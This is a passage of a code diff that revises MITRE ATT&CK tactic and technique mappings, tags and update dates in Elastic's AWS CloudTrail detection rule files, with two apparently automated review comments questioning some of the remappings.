@@ -106,24 +106,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "dca28dee-c999-400f-b640-50a081cc0fd1" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -134,3 +122,7 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml index db71d8487f4..e5d2305511a 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 
@@ -104,24 +104,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -132,42 +120,7 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.007" -name = "Cloud Services" -reference = "https://attack.mitre.org/techniques/T1021/007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" 
diff --git a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml index c81083059cd..f3eb07c91ed 100644 --- a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml +++ b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/02/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -121,32 +121,21 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml index 37786c113df..cd06e93a54e 100644 --- a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml +++ b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml 
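Review bot: The `@@ -121,32 +121,21 @@` hunk removes the T1556 / T1556.006 (Modify Authentication Process: Multi-Factor Authentication) technique and leaves only T1098.005 (Device Registration); for a rule whose filename says it detects virtual MFA device registration, T1556.006 is the sub-technique that explicitly describes MFA tampering, so dropping it narrows the rule's footprint in the ATT&CK matrix rather than tightening it. Both techniques sat under the same TA0003 entry on the old side, so keeping them does not conflict with the one-tactic-per-framework constraint. If the intent is a single technique per `[[rule.threat]]` entry, a short reason in the PR body would save the next reviewer from re-adding it.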
@@ -2,7 +2,7 @@ creation_date = "2020/06/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,16 +63,7 @@ references = [ risk_score = 21 rule_id = "39144f38-5284-4f8e-a2ae-e3fd628d90b0" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Network Security Monitoring", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -99,30 +90,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml index 3e29917bfd5..884d6a0a35b 100644 --- a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml +++ b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2025/09/04" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -91,15 +91,7 @@ references = [ risk_score = 21 rule_id = "e7cd5982-17c8-4959-874c-633acde7d426" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Network Security Monitoring", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -136,11 +128,20 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml index fd04f7d979e..239f05267be 100644 --- a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml +++ b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -71,16 +71,7 @@ references = ["https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/ec2-securi risk_score = 21 rule_id = "29052c19-ff3e-42fd-8363-7be14d7c5469" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Network Security Monitoring", - "Resources: Investigation Guide", - "Tactic: Persistence", - "Tactic: Defense Evasion" -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -117,25 +108,17 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml index dde1ff0a43d..7e081c3c90a 100644 --- a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml +++ b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml 
@@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/02/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,17 +107,7 @@ references = ["https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/"] risk_score = 21 rule_id = "c70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS CloudTrail", - "Data Source: AWS IAM", - "Data Source: AWS STS", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS IAM", "Data Source: AWS STS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -135,17 +125,21 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml index 829f6ade70b..6e4d05f7250 100644 
--- a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml +++ b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/02" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -143,24 +143,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/aws/persistence_iam_group_creation.toml b/rules/integrations/aws/persistence_iam_group_creation.toml index 1eb39e9cb91..900293ee8de 100644 --- a/rules/integrations/aws/persistence_iam_group_creation.toml +++ b/rules/integrations/aws/persistence_iam_group_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -98,22 +98,16 @@ event.dataset: aws.cloudtrail and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1136.003" -name = "Cloud Account" -reference = "https://attack.mitre.org/techniques/T1136/003/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml index 16c89c35694..6fde2381297 100644 --- a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,15 +98,7 @@ references = [ risk_score = 47 rule_id = "47403d72-3ee2-4752-a676-19dc8ff2b9d6" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -120,39 +112,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml index cc0704696b8..4e17091a11c 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml +++ b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -115,15 +115,7 @@ references = [
 risk_score = 21
 rule_id = "1d4ca9c0-ff1e-11ee-91cc-f661ea17fbce"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS IAM",
- "Use Case: Identity and Access Audit",
- "Tactic: Persistence",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -137,22 +129,39 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml
index 61a70e9d11f..3b4349b0ddf 100644
--- a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml
+++ b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/20"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -129,22 +129,21 @@ info where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/persistence_iam_saml_provider_created.toml b/rules/integrations/aws/persistence_iam_saml_provider_created.toml
index 4cf0be3208c..4a5c55f92b2 100644
--- a/rules/integrations/aws/persistence_iam_saml_provider_created.toml
+++ b/rules/integrations/aws/persistence_iam_saml_provider_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/05"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/02/05"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -94,15 +94,7 @@ references = [
 risk_score = 47
 rule_id = "a80ffc40-a256-475a-a86a-74361930cdb1"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS IAM",
- "Use Case: Identity and Access Audit",
- "Tactic: Persistence",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -116,39 +108,34 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1484"
 name = "Domain or Tenant Policy Modification"
 reference = "https://attack.mitre.org/techniques/T1484/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1484.002"
 name = "Trust Modification"
 reference = "https://attack.mitre.org/techniques/T1484/002/"
-
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml
index 0e89738a87d..1f7a7230315 100644
--- a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml
+++ b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/30"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -89,15 +89,7 @@ references = [
 risk_score = 47
 rule_id = "151d8f72-0747-11ef-a0c2-f661ea17fbcc"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS Lambda",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -113,17 +105,21 @@ info where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
+id = "T1578"
+name = "Modify Cloud Compute Infrastructure"
+reference = "https://attack.mitre.org/techniques/T1578/"
+[[rule.threat.technique.subtechnique]]
+id = "T1578.005"
+name = "Modify Cloud Compute Configurations"
+reference = "https://attack.mitre.org/techniques/T1578/005/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml
index 941d53cbad3..215103ed6fa 100644
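Review bot: The `@@ -113,17 +105,21 @@` hunk of persistence_lambda_backdoor_invoke_function_for_any_principal.toml reclassifies a Lambda resource-policy change as T1578.005 Modify Cloud Compute Configurations under Defense Evasion, which ATT&CK describes as changes to compute-environment settings such as quotas, regions or tenant-wide policies; a permission grant on a function reads more like an access-control change (the T1098 family) or the T1546 Event Triggered Execution entry this hunk drops, and the rule's own name still says "backdoor". persistence_route_53_hosted_zone_associated_with_a_vpc (a DNS change) and persistence_route_table_created use the same T1578.005 mapping and raise the same question. If T1578.005 is the intended reading for all three, a short rationale in the PR description would help; otherwise I would keep a Persistence entry alongside the new one so the rule keeps its original tactic coverage. The threat block is complete inside the hunk.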
--- a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml
+++ b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/27"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -111,17 +111,7 @@ references = [
 risk_score = 47
 rule_id = "f2015527-7c46-4bb9-80db-051657ddfb69"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS RDS",
- "Resources: Investigation Guide",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Privilege Escalation",
- "Tactic: Defense Evasion",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Resources: Investigation Guide", "Use Case: Threat Detection"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -136,36 +126,29 @@ info where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-[[rule.threat.technique.subtechnique]]
-id = "T1098.001"
-name = "Additional Cloud Credentials"
-reference = "https://attack.mitre.org/techniques/T1098/001/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/persistence_rds_instance_made_public.toml b/rules/integrations/aws/persistence_rds_instance_made_public.toml
index cac81e06dff..d21a1075755 100644
--- a/rules/integrations/aws/persistence_rds_instance_made_public.toml
+++ b/rules/integrations/aws/persistence_rds_instance_made_public.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/29"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -144,29 +144,29 @@ any where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-[[rule.threat.technique.subtechnique]]
-id = "T1556.009"
-name = "Conditional Access Policies"
-reference = "https://attack.mitre.org/techniques/T1556/009/"
+id = "T1578"
+name = "Modify Cloud Compute Infrastructure"
+reference = "https://attack.mitre.org/techniques/T1578/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1133"
+name = "External Remote Services"
+reference = "https://attack.mitre.org/techniques/T1133/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml
index 7fefa1edaae..b06ff83c72e 100644
